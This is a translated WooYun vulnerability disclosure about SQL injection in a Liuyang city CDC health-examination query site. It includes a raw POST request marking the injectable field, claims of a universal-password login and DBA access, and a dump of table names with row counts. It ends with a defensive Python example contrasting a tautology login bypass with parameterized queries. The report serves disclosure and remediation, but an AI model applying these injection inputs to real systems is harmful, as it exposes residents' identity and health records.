WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
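2015-10-18: Details reported to the vendor; awaiting vendor handling
2015-10-22: Vendor has confirmed; details disclosed only to the vendor
2015-11-01: Details disclosed to core white hats and experts in related fields
2015-11-11: Details disclosed to regular white hats
2015-11-21: Details disclosed to intern white hats
2015-12-06: Details disclosed to the public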
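As the title says.
Center for Disease Control and Prevention of Liuyang City, Hunan Province **.**.**.**
0x01. The query page is vulnerable to SQL injection, and a "universal password" can be used to log in.
0x02. The resident ID card number, employer, phone number, health status and so on of everyone in the city can be queried.
Administrators can be added.
0x03. Almost every query box is vulnerable to injection.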
POST /TJsearch/jktj_select_do.asp HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Referer: **.**.**.**/TJsearch/jktj_select.asp
Accept-Language: zh-CN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: **.**.**.**
Content-Length: 562
Pragma: no-cache
Cookie: ASPSESSIONIDCABBBRDD=OODNKJOAHNMHAAHNJBPPCFDH

select_db=JKTJ&readDb=True&textfield_b_1=&textfield_c_1=&textfield_d_1=&textfield_e_1=&textfield_a_2=&textfield_b_2=&textfield_e_2=&textfield_a_3=&textfield_b_3=&textfield_e_3=&textfield_b_4=&textfield_c_4=&textfield_d_4=&textfield_e_4=&textfield_b_5=&textfield_b_6=&textfield_b_7=&textfield_b_8=&textfield_b_9=&textfield_b_10=&textfield_e_10=&checkbox_11=b&textfield_b_11=123*&textfield_c_11=&textfield_d_11=&textfield_e_11=&textfield_b_12=&textfield_c_12=&textfield_d_12=&textfield_e_12=&textfield_b_14=%C4%D0&textfield_b_15=%BA%CF%B8%F1&Submit.x=28&Submit.y=16
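Multiple parameters are vulnerable to injection. Taking textfield_b_11 as an example, 26 databases are involved.
DBA privileges
The data volume of one arbitrarily chosen database: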
Database: TJ
+-------------------+---------+
| Table             | Entries |
+-------------------+---------+
| BARCODEREGISTER_D | 555345  |
| TJ_EXINFO         | 291367  |
| TJ_UPLOADLOG      | 147973  |
| JKTJ_JTSM         | 138642  |
| JKTJ_FEED         | 127467  |
| JKTJ_J            | 92799   |
| BARCODEREGISTER_M | 76928   |
| RECEIPTDTL_J      | 67767   |
| JKTJ_FEEM         | 67598   |
| TJ_EXINFO_T       | 52348   |
| ONLINEUSERS       | 44426   |
| TJ_SENDTUBED      | 30862   |
| T_SENDLIST        | 21222   |
| CODE_NO           | 5586    |
| JK_EDZYS          | 5477    |
| SYSMENUACCESSCTRL | 5441    |
| TUBECHECK_J       | 4655    |
| GANMODIHIS_J      | 1462    |
| JKTJ0224BK_J      | 986     |
| LABREPORT_G       | 976     |
| SYSCONSTRAINTS    | 816     |
| JKTJ0224_J        | 696     |
| LABREPORT_C       | 628     |
| DBPYMODIHIS_J     | 371     |
| TJ_SENDTUBEM      | 273     |
| TJ_CARDPRINT      | 271     |
| TJ_STREET         | 148     |
| DAYCHARGE_J       | 147     |
| SYSMENU           | 100     |
| J_JCZL            | 88      |
| DWM_O             | 67      |
| LABMONTH_J        | 64      |
| DATEUSE           | 57      |
| TMP_HEALTH        | 51      |
| IP_TBC_FIELDS     | 46      |
| LABDAILY_J        | 32      |
| JKTJ_DAY_J        | 29      |
| JKTJSTAT_DJ       | 29      |
| DOCTORS_J         | 27      |
| RECEIPT_J         | 26      |
| JKTJSTAT_QJ       | 25      |
| OPERATOR          | 25      |
| SYSSEGMENTS       | 24      |
| PBCATEDT          | 21      |
| PBCATFMT          | 20      |
| HW_TBS_ACTCONDD   | 18      |
| JKTJ_ITEM         | 16      |
| DATALEXICON       | 14      |
| LED_CONTENT       | 14      |
| HP_TBC_CFGITEMS   | 11      |
| JKTJ_RESULT       | 10      |
| TJ_CHARGE_DEPT    | 10      |
| HW_TBS_ACTCONDDEF | 9       |
| GZ_J              | 8       |
| JKTJ_GROUPD       | 8       |
| DWXZ_J            | 7       |
| TJ_CHARGE_ITEM    | 7       |
| DEPT              | 6       |
| HW_TBS_ACTDEF     | 6       |
| HW_TBS_PROCDEFD   | 6       |
| JKTJ_GROUP        | 6       |
| TMP_AREAGZ        | 5       |
| DWM_K             | 4       |
| JKTJSTAT_FJ       | 4       |
| MZ_J              | 3       |
| SYSPARAM          | 3       |
| HW_TBS_PROCDEFM   | 1       |
| JKTJ_JFZ          | 1       |
| WHCD_J            | 1       |
+-------------------+---------+
Filter the parameters.
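The fix above is to filter the parameters; binding request values as query parameters is the more dependable form of that fix. The added example below (not code from the report or from the affected site) contrasts a concatenated login query with a bound one on an in-memory SQLite database. The table names, column names, sample rows and the search-field format check are all assumptions.

```python
import sqlite3

# Constructed test input: the classic tautology behind a "universal password".
TAUTOLOGY = "' OR '1'='1"

def make_db():
    # Constructed sample data; table and column names are hypothetical.
    # Passwords are plaintext only to keep the demo short.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE operator (name TEXT, password TEXT);
        CREATE TABLE exam (record_no TEXT, name TEXT);
        INSERT INTO operator VALUES ('admin', 's3cret-constructed');
        INSERT INTO exam VALUES ('A0001', 'Alice'), ('A0002', 'Bob');
    """)
    return db

def login_concat(db, name, password):
    # Vulnerable pattern: request values are spliced into the SQL text,
    # so a quote in the input changes the structure of the statement.
    sql = ("SELECT COUNT(*) FROM operator WHERE name = '" + name +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchone()[0] > 0

def login_param(db, name, password):
    # Hardened: placeholders keep the input as data, never as SQL.
    sql = "SELECT COUNT(*) FROM operator WHERE name = ? AND password = ?"
    return db.execute(sql, (name, password)).fetchone()[0] > 0

def search_param(db, record_no):
    # Same fix for a search field such as textfield_b_11: an allowlist
    # check (assumed format: 1-32 alphanumerics) plus a bound parameter.
    if not (0 < len(record_no) <= 32 and record_no.isalnum()):
        return []
    sql = "SELECT record_no, name FROM exam WHERE record_no = ?"
    return db.execute(sql, (record_no,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    print("concatenated login accepts tautology:", login_concat(db, "admin", TAUTOLOGY))
    print("parameterized login accepts tautology:", login_param(db, "admin", TAUTOLOGY))
    print("search with valid value:", search_param(db, "A0001"))
    print("search with quoted value:", search_param(db, "A0001" + TAUTOLOGY))
```

The format check alone is not the fix: the bound parameter is what prevents the input from being parsed as SQL, and the application's database account should also not hold DBA privileges.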
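Severity: High
Vulnerability Rank: 10
Confirmed at: 2015-10-22 14:27
CNVD confirmed and reproduced the vulnerability described, and has passed it to CNCERT to forward to the corresponding branch center, which will coordinate follow-up handling with the organization that manages the website.
None yet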